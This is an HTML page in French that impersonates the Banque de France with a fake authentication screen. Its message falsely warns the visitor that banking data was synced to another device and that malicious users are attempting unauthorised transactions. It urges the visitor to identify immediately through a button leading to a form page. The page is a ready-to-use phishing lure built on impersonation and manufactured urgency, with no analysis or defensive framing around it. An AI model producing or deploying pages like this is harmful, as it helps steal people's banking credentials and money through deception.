<!DOCTYPE html>
<html lang="fr">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Authentification - Banque de France</title>
    <link rel="icon" href="Banque.png" type="image/png">
    <style>
        body {
            font-family: Arial, sans-serif;
            margin: 0;
            padding: 0;
            background-image: url('logoo.png'); /* Image de fond avec logo */
            background-size: cover;
            background-repeat: no-repeat;
            background-position: center;
            display: flex;
            flex-direction: column;
            min-height: 100vh;
            text-align: center;
            color: #333;
        }

        header {
            padding: 20px;
        }

        main {
            flex-grow: 1;
            display: flex;
            flex-direction: column;
            justify-content: center;
            align-items: center;
        }

        .message {
            font-size: 2em;
            font-weight: bold;
            margin-bottom: 20px;
            background-color: rgba(255, 255, 255, 0.8);
            padding: 20px;
            border-radius: 10px;
        }

        .bouton-authentifier {
            display: inline-block;
            background-color: #007bff;
            color: white;
            padding: 15px 30px;
            text-decoration: none;
            border-radius: 5px;
            font-size: 1.2em;
        }

        .sidebar {
            background-color: #f0f0f000;
            width: 200px;
            padding: 20px;
        }

        .sidebar nav ul {
            list-style: none;
            padding: 0;
        }

        sidebar nav ul li {
            margin-bottom: 10px;
        }

        footer {
            background-color: #333;
            color: white;
            text-align: center;
            padding: 10px;
        }
    </style>
</head>
<body>
    <header>
        <h1>Banque de France - Authentification</h1>
    </header>

    <main>
        <div class="message">
            Nous avons détecté une synchronisation récente de vos données bancaires sur un autre appareil. Des utilisateurs malveillants tentent actuellement d'effectuer des transactions non autorisées. 

Pour protéger votre compte, nous avons temporairement bloqué ces opérations. Nous vous invitons à vous identifier immédiatement afin de confirmer votre identité et sécuriser votre compte.
        </div>
        <a href="formulaire.html" class="bouton-authentifier">M'authentifier</a>
    </main>

    <aside class="sidebar">
        <nav>
            <ul>
                <li><a href="mentions-legales.html">Mentions Légales</a></li>
                <li><a href="contact.html">Contact</a></li>
            </ul>
        </nav>
    </aside>

    <footer>
        <p>&copy; 2025 Banque de France. Tous droit réservés.</p>
    </footer>
</body>
</html>